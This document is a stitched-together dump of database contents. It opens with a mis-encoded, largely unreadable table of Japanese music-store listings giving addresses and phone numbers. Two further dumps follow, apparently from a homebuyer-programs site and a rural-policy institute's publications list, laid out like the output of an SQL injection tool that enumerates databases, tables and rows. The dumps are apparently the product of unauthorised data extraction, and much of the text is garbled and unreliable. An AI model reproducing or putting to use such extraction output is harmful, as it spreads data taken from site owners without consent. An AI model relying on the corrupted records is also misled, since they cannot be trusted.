| ?a?J??\90_\93?\82P\81|\82P\82Q\81|\82P\82W | ?\81?]\83\93?a?J\82X\82e | 0000000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \82\a6\82ソ\82イ\82\e2?~???[?W?b?N | 150-0041 | 8 | 0 | 03-3464-0905 | NULL | NULL | NULL | | 88 |
| ?a?J?\e6???u\92\ac\82Q\82S\81|\82Q | \91\e6\82R\95x\8em?、\8e??r??\82V\82e | 1000000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?r\95?\8ay\8a\ed\93X\81@\8c\ae?\d5\93ー | 150-0031 | 8 | 0 | 03-5728-6941 | NULL | NULL | NULL | | 29 |
| ?a?J?\e6?\f7?u?\ac\82Q\82S\81|\82Q | \91\e6\82R\95x\8em\8f\a4\8e??r??\82T\82e | 0100000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?r\95?\8ay\8a\ed\93X\81@POWER REC\93X?@\82T\82e | 150-0031 | 8 | 0 | 03-5456-8809 | NULL | NULL | NULL | | 83 |
| ?a?J?\e6?\f7?u?\ac?Q\82S\81|\82Q | \91\e6\82R\95x\8em?\a4\8e??r??\82U\82e | 0100000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?r\95?\8ay\8a\ed\93X\81@POWER REC\93X\81@\82U\82e | 150-0031 | 8 | 0 | 03-5456-8809 | NULL | NULL | NULL | | 84 |
| ?L\93??\e6\93\ec?r\91\dc\82P\81|?Q\82W\81|\82Q | \82o\81f\82o\82`\82q\82b\82n\81@\82V\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (??)\90ホ?エ\8ay\8a\ed\93X ?r\91\dc\93X | 171-0022 | 8 | 0 | 03-3980-1484 | NULL | NULL | NULL | 03-3980-1484 | 31 |
| \90V?h?\e6\90V?h\82R\81|\82R\82S\81|\82P | \82i\82t?q\82`?j\82t\81@\82s\82v\82h\82m\81@\82a\93 | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90V\90\af\93ー\81@???b?N?C?\93\90V?h\93X | 160-0022 | 8 | 0 | 03-3354-5502 | NULL | NULL | NULL | NULL | 33 |
| \96L\93???\93\8c?r\91\dc\82P\81|\82P\82V\81|\82W | ?r\91\dcTG?z\81[?\81?X?g?r | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?~??\81[?W?b?N?\89?\93?h?@KEY\93\8c??\81@?r\91\dc\93X | 170-0013 | 8 | 0 | 03-5952-1144 | NULL | NULL | NULL | | 32 |
| ?L\93??\e6?\8c?r\91\dc?P\81|\82R\82U\81|\82V | ?A???e\81[???r\91\dcB\82PF | 0010000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \8a?)?r\95\94\8ay\8a\ed\93X\81@POWER DJ's\81@?r\91\dc\93X | 170-0013 | 8 | 0 | 03-5956-6588 | NULL | NULL | NULL | | 89 |
| \90V?h?\e6\90V?h\82R\81|\82R\81|\82Q | \90V?h\92n?コ\93S\89\ef\8a\d9?r??\82Q\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90ホ?エ\8ay\8a\ed\93X\81@\90V?h\93X | 160-0022 | 8 | 0 | 03-3350-1484 | NULL | NULL | NULL | | 34 |
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| \90?\91?\93c?\e6\90_\93c\8fx?\cd\91\e4\82P\81|\82W | \82PF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \81i\8a\94\81j\90ホ?エ\8ay\8a\ed\93X\81@\8c\e4\92??m\90?ANNEX | 101-0062 | 8 | 0 | 03-3292-1484 | NULL | NULL | NULL | | 36 |
| \90?\91?\93c\8b\e6\90_\93c?イ?v\8aヤ?\ac\82P\81|\82P\82T | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ???I?b?N?X(\8a?)\81@MUSIC VOX | 101-0025 | 8 | 0 | 03-3258-4141 | NULL | NULL | NULL | | 37 |
| ?n\93c?\e6?]\93\8c?エ\82S\81|\82Q\82V\81|\82P\82S | ?\d1\8e\85\92\ac\83\8a???B?\93\82V\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91\ba\8ay\8a\ed\81@(\8a?)?@?\d1\8e??\ac\93X | 130-0022 | 8 | 0 | 03-5600-3888 | NULL | NULL | NULL | | 38 |
| ??\91?\93c?\e6\90_\93c?イ?v\8aヤ?\cd\8aン\82T\82T | ?\a9\95\97?r | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\92r\95?\8ay\8a\ed\93X\81@?\8a?{?\8c?H\97t\8cエ | 101-0026 | 8 | 0 | 03-3862-0069 | NULL | NULL | NULL | | 39 |
| \90?\91?\93c?\e6\8aO\90_\93c?R\81|\82P\82R\81|\82V | ?j??\81[?J?N?^?r | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (??)?\?t?}\83b?v\81@?H\97t\8cエ\82l\82\81\82?\81E?N?\8a?G?C\83^\81[?Y\8a\d9 | 101-0021 | 8 | 0 | 03-5256-2927 | NULL | NULL | NULL | | 40 |
| \90??\e8\8es\90??\e8?\e6\93\fa\90i\92\ac\82P\81|\82P\82P | ???t??\83?\82V\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91\ba\8ay\8a\ed\81@(\8a?)\81@\90??\e8???t????\93X | 210-0024 | 9 | 0 | 044-221-5261 | NULL | NULL | NULL | | 41 |
| \90??\e8\8es?K?\e6?x\90??\ac\82V\82Q\81|\82P | ???]\81[?i\90??\e8?v???U\82S\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed\81@(\8a?)\81@???]\81[?i\90??\e8\93X | 212-0013 | 9 | 0 | 044-520-8097 | NULL | NULL | NULL | | 42 |
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| \89。\95l\8es\90シ?\e6\93??K\82Q\81|\82P\82T\81|\82P\82R | ?r\83u\83\8c\82WF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed?@(\8a?)\81@?。?l\93X | 220-0005 | 9 | 0 | 045-314-5255 | NULL | NULL | NULL | | 44 |
| \95l?シ\8es?\86?\e6?b?\e8?\ac\82P\82O\82O\81|\82P | ?U?U?V?e?B\95l?シ?\86?\9b\8a\d9\82R\82O\82U | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ?N?G?X?g?~??\81[\83W?b?N???[?N\83X(\8a\94)\81@?N?G?X?g?~??\81[?W?b?N\82y\82`\82y\82` \82b\82h\82s\82x | 430-0933 | 23 | 0 | 053-459-1393 | NULL | NULL | NULL | | 45 |
| \95l?シ\8es?\86?\e6?\82\97\d1\82S\81|\82T\81|\82W | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ?\?j\83b?N?V?X?e?\81(\8a?)\81@\82r\82n\82m\82h\82w | 430-0907 | 23 | 0 | 053-476-6688 | NULL | NULL | NULL | | 46 |
| \90テ?\aa?s\88\a8?\e6\8d\ae?\ae?\ac6-7 | \90テ?\aa?p???R7F | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed\81@(\8a?)\81@\90テ?\aa?p??\83R\93X | 420-0852 | 23 | 0 | 054-275-5530 | NULL | NULL | NULL | | 47 |
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| ?k?シ\8cテ?\ae\8es?\ed\e8モ\8e\9b\90シ\82P\81|\82P\82Q\82V | NULL | 0000000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ?I?^?C?I\81[?f?B?I(\8a?) | 481-0032 | 21 | 0 | 0568-48-1610 | NULL | NULL | NULL | | 90 |
| ?L?エ\8es\93??h?\ac\8e??\f3?r\82S\82S\81|\82V | NULL | 1000000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\97L)?V???C | 441-8107 | 21 | 0 | 0532-46-4654 | NULL | NULL | NULL | | 49 |
| ?シ\8cテ?\ae\8es\90シ?\e6??\90シ4-31-5 | NULL | 0010000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (??)\90\b7?K\93ー\8ay\8a\ed | NULL | 21 | 0 | 052-522-5541 | NULL | NULL | NULL | NULL | 91 |
| ?\aa?\e8\8es\8cヒ?\e8?\ac\8e?\8aO\8eR\82R\82W\81|\82T | ?C?I?\93?\82\81[???\aa?\e8\82RF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ?y\8a\ed (\8a?)\81@?C?I?\93??\81[???\aa?\e8\93X | 444-0840 | 21 | 0 | 0564-59-1077 | NULL | NULL | NULL | | 50 |
| ?シ\8cテ?\ae\8es?シ?\e6\93\f1\95??\ac\82S\82O | \82?\82?\82?\82??\8f?\93?_\81[?V?e?B\82S\8aK\81@\82S\82O\82O\82P | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\82?\82\97\82?\81|\82\86\82?\82?\82?\81@?シ\8cテ?\ae???\93?_\81[\83V\83e?B\93X | 452-0817 | 21 | 0 | 052-506-2569 | NULL | NULL | NULL | | 51 |
| ?シ\8cテ?\ae\8es?\86?\e6?\d1\82P\81|\82P\82W\81|\82Q\82W | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?\84?}?n?~??\81[?W?b?N\93\8c\8aC\81@?シ\8cテ?\ae\93X | 460-0003 | 21 | 0 | 052-201-5151 | NULL | NULL | NULL | | 52 |
| ?シ\8cテ?\ae\8es?\86?\e6?h\82R\81|\82S\81|\82T | ?X?J?C?r??\82X\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90\ce?エ\8ay\8a\ed\93X \96シ\8cテ?\ae?h\93X | 460-0008 | 21 | 0 | 052-243-1484 | NULL | NULL | NULL | | 53 |
| ?シ\8cテ?\ae\8es?\86?\e6?h\82R\81|\82Q\82X\81|\82P | ?シ\8cテ?\ae?p???R\93\8c\8a\d9\82TF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed (\8a?) ?シ\8cテ?\ae\83p???R\93X | 460-0008 | 21 | 0 | 052-264-8316 | NULL | NULL | NULL | | 54 |
| ??\93s\8es?\86???\e6\8eO???ハ\90V???ノ\8ap | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\82i\82d\82t\82f\82h\82`\81@\8eO???{\93X?@\82a\82P\81g\82r\82s\82`\82f\82d\81h | 604-0000 | 27 | 0 | 075-254-3700 | NULL | NULL | NULL | | 55 |
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| \91???\8es?k?\e6\8ap\93c?\ac | ???}?O???\93?h?r??\82R\82O\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \90~\93c?h?J?C\8ay\8a\ed(\8a?) | 530-0017 | 25 | 0 | 06-6315-7517 | NULL | NULL | NULL | | 57 |
| \91???\8es?k?\e6?~\93c\82P???レ?Q?ヤ\82Q\81|\82P\82O\82O?\86 | \91??\e3\89w\91O\91\e6\82Q?r?\8b\82PF\81@\82W\81|?P\82b | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \8eO?リ\8ay\8a\ed (\8a?)TOOL'S | 530-0013 | 25 | 0 | 06-6456-3881 | NULL | NULL | NULL | | 58 |
| \91???\8es?k?\e6???\ae?\ac\82P\82O\81|\82P\82Q | \82m\82t\81|\82?\82\88\82\81\82\99\82\81\82?\82\81\82?\82\88\82?\82T\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90ホ?\b4\8ay\8a\ed\93X\81@\94~?c\93X | 530-0013 | 25 | 0 | 06-6486-1484 | NULL | NULL | NULL | | 59 |
| \91???\8es?Q\91\ac?\e6\93\fa?{?エ\82P???レ\82P\81|\82P\82W | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\97L)?}\81[?N?X?~??\81[?W?b?N | 556-0005 | 25 | 0 | 06-6635-0267 | NULL | NULL | NULL | | 60 |
| \91??\e3\8es?Q\91\ac?\e6\93\fa?{?エ\82R\81|\82U\81|\82Q\82T | \82\c8\82\f1\82ホ\93X?U?E???X\82Q\81@\82S\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?\?t?}?b?v\81@\82\c8\82\f1\82ホMAC\81E?b\82q\82d\82`\82s\82n\82q\82r \82k\82`\82m\82c | 556-0005 | 25 | 0 | 06-6634-0071 | NULL | NULL | NULL | | 61 |
| \91?\8d?\8es?\86?\9b??\90S?ヨ?エ?リ\82P???レ\82X\81|\82S | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \8eO?リ\8ay\8a\ed (\8a?)\81@\90S?ヨ?エ\93X | 542-0085 | 25 | 0 | 06-6251-4593 | NULL | NULL | NULL | | 62 |
| \91??\e3\8es?\86?\9b?\e6\90S?ヨ?エ?リ\82P\81|\82X\81|\82P | \82o\82\81\82?\82?\82?\82V\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90ホ?エ\8ay\8a\ed\93X \90S?ヨ?エ\93X | 542-0085 | 25 | 0 | 06-6241-1484 | NULL | NULL | NULL | | 63 |
| \91???\8es?\86?\9b?\e6\90シ\90S?ヨ?エ\82P\81|\82U\81|\82P\82S | \82a\82h\82f\81@\82r\82s\82d\82o\81@\82R\82e | 0010000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \8eO?\d8\8ay\8a\ed(\8a?)\81@DJ'S | 542-0086 | 25 | 0 | 06-4704-5555 | NULL | NULL | NULL | | 92 |
| \90シ?{\8es?\82?シ?ャ\82P?S\81|\82Q\81|\82R\82R\82Q | ???}\90シ?{?K\81[?f?\93?Y3F | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\82?\82\97\82?\81|\82\86\82?\82\96\82?\81@???}\90シ?{?K\81[?f?\93?Y\93X | 663-8204 | 26 | 0 | 0798-62-2525 | NULL | NULL | NULL | | 64 |
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| \90_\8cヒ\8es?\86?\9b?\e6?O?{?\ac\82Q?|\82P\82P\81|\82P\81|\82Q\82R\82P | ?Z?\93?^\81[\83v???U\90シ\8a\d9\82Q\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?\8a\81[?h?}?\93 \8eO?{\93X | 650-0021 | 26 | 0 | 078-392-0954 | NULL | NULL | NULL | | 66 |
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| \88ノ\97\\8cS?シ\91O?\ac?\9b\88\e4?W\82T\82O | ?G?~?t??MASAKI\82PF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91\ba\8ay\8a\ed (\8a?)\81@\83G?~?t?\8bMASAKI\93X | 791-3120 | 38 | 0 | 089-961-8890 | NULL | NULL | NULL | | 69 |
| ?シ\8eR\8es\8eO?ヤ?\ac\82V?\9a?レ\82U\81|\82P\82Q | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?E?G?X?g | 790-0003 | 38 | 0 | 089-947-2510 | NULL | NULL | NULL | | 70 |
| \95\9f\8eR\8es\93?\91\a0\89\a4?\ac\82P???レ\82P\82R?\d4\82Q?\86 | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\95\9f\8eR\8ay\8a\ed?Z?\93?^\81[ | 721-0973 | 34 | 0 | 084-924-5331 | NULL | NULL | NULL | | 71 |
| \8dL\93?\8es?\86?\e6?{?\ca\82P\82O\81|\82P | ?L\93?\83p???R?{\8a\d9\82XF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed (\8a?)\81@?L\93??p???R\93X | 730-0035 | 34 | 0 | 082-542-2212 | NULL | NULL | NULL | | 72 |
| ?\aa\8eR\8cァ\91q\95~\8es\90?\8d]1?ヤ?n | ?C?I?\93?\82\81[???q\95~\82QF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed (\8a?)\81@?C?I?\93?\82\81[\83\8b\91q\95~\93X | 710-0802 | 33 | 0 | 086-430-5666 | NULL | NULL | NULL | | 73 |
| ?\aa\8eR\8es\96k?\e6?\86\8eR?コ\82P\81|\82P\82P\81|\82T\82S | \82k\82n\82s?y\82U\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91\ba\8ay\8a\ed (\8a?)\81@?\aa\8eR???b?c\93X | 700-0821 | 33 | 0 | 086-226-8111 | NULL | NULL | NULL | | 74 |
| \95\9f?\aa\8es?\86?\9b?\e6\93V\90_\82P\81|\82P\82P\81|\82P | \93V\90_?r?u?\8c\82V\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?~??\81[?W?b?N???\93?h\81@KEY\95\9f?\aa\93X | 810-0001 | 40 | 0 | 092-716-0404 | NULL | NULL | NULL | | 75 |
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| \8cF?{\8es\8e\e8\8e\e6?{?\ac?T\81|\82P | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed (\8a?)\81@\8cF?{?p?\8b?R?X | 860-0808 | 43 | 0 | 096-327-4066 | NULL | NULL | NULL | | 78 |
| \8cF\96{\8es??\95i\8e\9b\82U\81|\82P\81|\82Q\82Q | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ?~??\81[\83W?b?N?t?@\81[?\81 | 862-0976 | 43 | 0 | 096-362-8028 | NULL | NULL | NULL | | 79 |
| \8eュ\8e\99\93?\8es\93\8c\8aJ?\ac\82V | ?C?I?\93?\82\81[??\8eュ\8e\99\93?\83V???b?s?\93?O?Z?\93?^\81[\82R\82e\81@\82R\82P\82X?\e6?\e6 | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\82?\82\97\82?\81|\82\86\82?\82?\82?\81@\8eュ\8e\99\93??C?I?\93\93X | 891-0115 | 46 | 0 | 099-263-1469 | NULL | NULL | NULL | | 80 |
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| \89ォ\93\ea\8es\8c\d3?\ae\82P\81|\82R\81|\82S | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a\94)\95\81\8bv\8cエ\8ay\8a\ed | 904-0021 | 47 | 0 | 098-938-9375 | NULL | NULL | NULL | | 82 |
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| ??\91\e4\8es\90\c2\97t\8b\e6\88\ea?ヤ?\ac\82Q\81|\82U\81|\82T | NULL | 1000000000 | 2009-09-30 | 2009-09-30 | NULL | NULL | \81i\8a?\81j?\84?}?n?~??\81[?W?b?N\93\8c?k\81@\90?\91\e4\93X | 980-0811 | 4 | 0 | 0222-27-8516 | NULL | NULL | NULL | | 93 |
| ?k?シ\8cテ\89\ae\8es??\e8\d3\8e\9b\90シ\82P\81|\82P\82Q\82V | NULL | 0010000000 | 2009-10-01 | 2009-10-01 | NULL | NULL | ?I?^?C?I\81[?f?B?I(\8a?)  | 481-0032 | 21 | 0 | 0568-48-1610 | NULL | NULL | NULL | | 94 |
available databases [1]:
[*] miamihomeprograms_com_-_11
Database: `miamihomeprograms_com_-_11`
[4 tables]
| education |
| notes |
| programs |
| realtors |
Database: `miamihomeprograms_com_-_11`
Table: education
[13 columns]
| Column | Type |
| address | numeric |
| city | numeric |
| code | numeric |
| comments | numeric |
| description | numeric |
| fee | numeric |
| id | numeric |
| name | numeric |
| phone | numeric |
| state | numeric |
| status | numeric |
| title | numeric |
| zip | numeric |
Database: `miamihomeprograms_com_-_11`
Table: education
[1 entry]
| address | city | code | comments | description | fee | id | name | phone | state | status | title | zip |
| BCHA | Lauderdale Lakes | NULL | NULL | <br>The First Time Homebuyers Workshops educate prospective homebuyers and provide an opportunity to receive a Certificate of Completion on the following topics: <br>
- Discussion on the role of the buyer/seller and the various professionals involved<br>
- Questions to assess readiness to buy<br>
- Preparing for home purchase<br>
- Understanding credit, mortgage financing, tax relief programs, predatory lending and fair housing issues<br>
- One-on-one counseling session to address your individual needs<br>
<br>The workshop is intended to help prospective homebuyers understand the home purchase process and allow them to determine their readiness to purchase a home in Broward County. If you require a Certificate you will have to schedule a one-on-one counseling session in addition to attending the First Time Homebuyer Workshop. To make an appointment, call (954) 497-4583 or visit <br> | FREE | 55 | Miami-Dade Housing Finance Authority Single Family Bond | 954-497-4583 | Florida | Active | First-Time Homebuyers Education Workshop | 33319 |
available databases [1]:
[*] rupri
Database: rupri
[2 tables]
| Products |
| States |
Database: rupri
Table: Products
[5 columns]
| Column | Type |
| category | numeric |
| description | numeric |
| filename | numeric |
| id | numeric |
| title | numeric |
Database: rupri
Table: Products
[341 entries]
| category | description | filename | id | title |
| NULL | Opening address by RUPRI President Brian Dabson to the Rural Partners Forum 2009: <EM>Funding Our Future: Growing the Resources We Need to Create the Communities We Want.<BR></EM>November 5, 2009 | Dabson_RuralPartners_Nov09.pdf | 303 | A National Imperative: Why Must We Invest in Rural America? |
| NULL | Charles W. Fluharty, RUPRI President<BR>Written statement for the record<BR>Testimony before the U.S. House of Representatives<BR>Committe on Agriculture<BR>Subcommittee on Specialty Crops, Rural Development and Foreign Agriculture<BR>March 21, 2007 | testimony032107.pdf | 102 | Testimony before the Subcommittee on Specialty Crops, Rural Development and Foreign Agriculture |
| NULL | by RUPRI President Charles Fluharty and RUPRI Program Director Kathleen Miller, presented to the <EM>Economic Development in Underserved Communities: Where Research and Practice Meet</EM> Conference, Federal Reserve Bank of Kansas City, September 10, 2010. | Fluharty_KCFed_Sept10.pdf | 328 | Regional Innovation Policy: Approaches Which Ensure a Commitment to the Rural-Urban Continuum |
| NULL | Updated State Profile for Wisconsin<BR>December 31, 2008 | Wisconsin2.pdf | 232 | Wisconsin State Profile Update |
| NULL | Data brief by Kathleen Miller, RUPRI Program Director<BR>August, 2008 | race_ethnicity.pdf | 162 | Data Brief: Racial and Ethnic Composition of the Population |
| NULL | Keynote by RUPRI President Chuck Fluharty to the Indiana Rural Summit, Indianapolis, IN<BR>November 2010 | Fluharty_Indianapolis_Nov2010.pdf | 350 | Re-Calibrating a Place Primacy in Public Policy: Rural Communities, Rural Regions, and The Rural Urban Continuum |
| NULL | Presented by Charles W. Fluharty, RUPRI President Emeritus, to the 2008 Rural Health Journalism Workshop, May 2, 2008, Columbia, MO. | Fluharty_JSchool.pdf | 154 | What Reporters Should Know About Rural Residents |
| NULL | <UL>
<LI>Entrepreneurship, Social and Political Capital, and Rural Poverty</LI>
<LI>Changes in Concentrated Poverty in Metro and Nonmetro Areas</LI>
<LI>Child Care Subsidy Use in Rural and Urban Oregon</LI>
<LI>New Views on Causes of Rural Poverty</LI></UL> | vol4no3.pdf | 207 | Volume 4, Number 3: August 2007 |
| Rural Health Panel Documents | Policy Paper from the RUPRI Rural Health Panel<BR>February 2005 | BriefingPaper022105.pdf | 126 | Impacts of the Medicare Modernization Act on Rural Health Systems and Beneficiaries |
| NULL | Announcement of Rural Policy Briefing: <EM>Rethinking Federal Investments in Rural Transportation: Rural Considerations Regarding Re-authorization of the Surface Transportation Act.<BR></EM>April 7, 2011 | RUPRI_Trans_brief_flyer.pdf | 361 | Briefing Announcement: Rethinking Federal Investments in Rural Transportation |
| NULL | Updated state profile for Vermont<BR>February 9, 2009 | Vermont2.pdf | 256 | Vermont State Profile Update |
| State Profiles | Florida Demographic and Economic Profile, updated December 2006 | Florida.pdf | 33 | Florida |
| NULL | RUPRI Farm Bill Policy Brief #1<BR>Kathleen K. Miller, RUPRI Program Director and Charles W. Fluharty, RUPRI President | RUPRI_Farm_Bill_Policy_Brief__3_.pdf | 80 | Targeting Rural Populations based on Urbanized Area Geographies |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-06, June 2005<BR>Craig Gunderson | WP0506.pdf | 180 | Are the Effects of the Macroeconomy and Social Policies on Poverty Different in Rural America? |
| NULL | Eight Priniciples for Effective Rural Governance...And How Communities Put Them into Practice<BR>Report by the RUPRI Rural Governance Initiative<BR>July 2006 | RGIreport.pdf | 103 | Rural Governance Report |
| State Profiles | Arizona Demographic and Economic Profile, updated August 2006 | Arizona.pdf | 26 | Arizona |
| NULL | Presented by Keith Mueller to the Illinois Rural Health Association<BR>April 13, 2011 | Mueller_IL_April2011.pdf | 368 | The Impact of Health Reform on Rural Communities |
| NULL | Presentation by Keith Mueller to the Nebraska Rural Health Association<BR>September 16, 2010 | Mueller_NebRHA_Sept2010.pdf | 331 | National Health Care Reform: What is Next |
| Rural Health Panel Documents | Special Monograph from the RUPRI Rural Health Panel<BR>May 2001 | monograph.PDF | 116 | Redesigning Medicare: Considerations for Rural Beneficiaries and Health Systems |
| State Profiles | Hawaii Demographic and Economic Profile, updated September 2006 | Hawaii.pdf | 35 | Hawaii |
| NULL | RUPRI Rural Poverty Research Center Working Paper #07-01, February 2007<BR>Elizabeth E. Davis, Deana Grobe, and Roberta B. Weber | WP07-01.pdf | 190 | Participation and Employment Dynamics of Child Care Subsidy Users in Rural and Urban Oregon |
| State Profiles | New Hampshire Demographic and Economic Profile, updated October 2006 | NewHampshire.pdf | 53 | New Hampshire |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-05, August 2004<BR>John M. Ulimwengu and David S. Kraybill | WP0405.pdf | 170 | Poverty over Time and Location: An Examination of Metro-Nonmetro Differences |
| NULL | Executive Summary:&nbsp;Commentary from the RUPRI Health Panel regarding "Financing Comprehensive Health Care Reform: Proposed Health System Savings and Revenue Options" from the Senate Finance Committee (May 2009).<BR>June 15, 2009 | HealthPanel_FinanceJune09_2_ExecSum.pdf | 294 | Executive Summary: A Rural Perspective/Commentary Regarding Financing Health Care Reform |
| Rural Health Panel Documents | A Joint Policy Paper of the Maine Rural Health Research Center and the RUPRI Rural Health Panel<BR>June 2000 | p2000-8.pdf | 114 | Improving Prescription Drug Coverage for Rural Medicare Beneficiaries: Key Rural Considerations and Objectives for Legislative Proposals |
| NULL | RUPRI Rural Poverty Research Center Working Paper #06-01, February 2006<BR>Gary P. Green | WP06-01.pdf | 183 | Gender, Race, and Employer-Provided Job Training in Low Wage Jobs |
| NULL | Data brief by RUPRI Program Director Kathy Miller
May 2010 | Poverty and Definition of Rural.pdf | 321 | Why Definitions Matter: Rural Definitions and State Poverty Rankings |
| NULL | RUPRI Comments to the U.S. Department of Commerce National Telecommunications and Information Administration and U.S. Department of Agriculture Rural Utilities Service on Broadband Initiatives in the American Recovery and Reinvestment Act of 2009 | NTIA_RUS.pdf | 272 | RUPRI Comments on Broadband Initiatives in the ARRA |
| State Profiles | Washington Demographic and Economic Profile, updated July 2006 | Washington.pdf | 71 | Washington |
| NULL | Narrative Table: Commentary from the RUPRI Rural Health Panel regarding "Expanding Health Care Coverage: Proposals to Provide Affordable Coverage to All Americans" from the Senate Finance Committee (May 2009)<BR>June 9, 2009 | HealthPanel_FinanceJune09_Table.pdf | 290 | Narrative Table: A Rural Perspective/Commentary Regarding Expanding Health Care Coverage |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-03, June 2004<BR>Bruce Weber and Leif Jensen | WP0403.pdf | 168 | Poverty and Place: A Critical Review of Rural Poverty Literature |
| State Profiles | Tennessee Demographic and Economic Profile, updated September 2006 | Tennessee.pdf | 66 | Tennessee |
| NULL | Presented by Charles W. Fluharty, RUPRI President Emeritus<BR>Mid Michigan Community College<BR>October 26, 2007 | MidMichigan.pdf | 147 | Rethinking the Role of Higher Education in Rural Development |
| NULL | Presented by Tom Johnson to the Missouri Broadband Summit, Jefferson City, Missouri.<BR>October 26, 2010 | Johnson_Broadband_Oct2010.pdf | 339 | Broadband for Agriculture and Environment |
| NULL | A background briefing report to the National Rural Funders Collaborative (NRFC) in preparation for a consultative dialogue with the U.S. foundation community interested in national rural policy issues.<BR>February 2007 | NRFC020207.pdf | 76 | Philanthropy and Rural Policy: Reframing the Way Forward |
| NULL | Analysis by Tim McBride from the RUPRI Rural Health Panel<BR>December 16, 2009 | McBride_Insurance_Dec09.pdf | 305 | Impact of the Patient Protection and Affordable Care Act on Covered Persons |
| State Profiles | California Demographic and Economic Profile, updated July 2006 | California.pdf | 28 | California |
| NULL | RUPRI Rural Poverty Research Center Working Paper #06-07, February 2006<BR>Kathleen Pickering, David Mushinski, and John C. Allen | WP06-07.pdf | 189 | The Role of Social Capital in Poverty Alleviation in Native American Reservation Communities |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-08, December 2004<BR>Donald P. Hirasuna and Thomas F. Stinson | WP0408.pdf | 173 | Urban and Rural Differences in Utilization of State Earned Income Tax Credit Programs: Minnesota's Experience |
| State Profiles | Alabama Demographic and Economic Profile, updated January 2007 | Alabama.pdf | 24 | Alabama |
| NULL | Policy Brief by the RUPRI Rural Health Panel. Lead authors A. Clinton MacKinney and Jennifer P. Lundblad. December, 2010. | HealthPanel_ACA_Dec2010.pdf | 346 | Securing High Quality Health Care in Rural America: The Impetus for Change in the Affordable Care Act |
| NULL | The RUPRI Health Panel provides a rural commentary on the House Tri-Committtee Health Reform Discussion Draft. | HealthPanelCommentaryJuly1309.pdf | 296 | Rural Commentary July 13 2009 |
| State Profiles | North Dakota Demographic and Economic Profile, updated June 2006 | NorthDakota.pdf | 58 | North Dakota |
| NULL | Updated state profile for Maryland<BR>February 13, 2009 | Maryland2.pdf | 262 | Maryland State Profile Update |
| NULL | News Release, April 5, 2010. | Press_Release_Leadership_April2010.pdf | 313 | RUPRI Announces Senior Leadership Changes |
| NULL | Updated State Profile for Pennsylvania<BR>December 31, 2008 | Pennsylvania2.pdf | 230 | Pennsylvania State Profile Update |
| Rural Health Panel Documents | Issue brief from the RUPRI Rural Health Panel<BR>May 2006 | IssueBrief.pdf | 91 | Medicaid and Its Importance to Rural Health |
| NULL | Presentation by Marcie McLaughlin, RUPRI Director of Constituent Relations, to the National Governors Association.<BR>May 13, 2008 | MM_NGAppt.pdf | 155 | Rural America: Conditions and Trends |
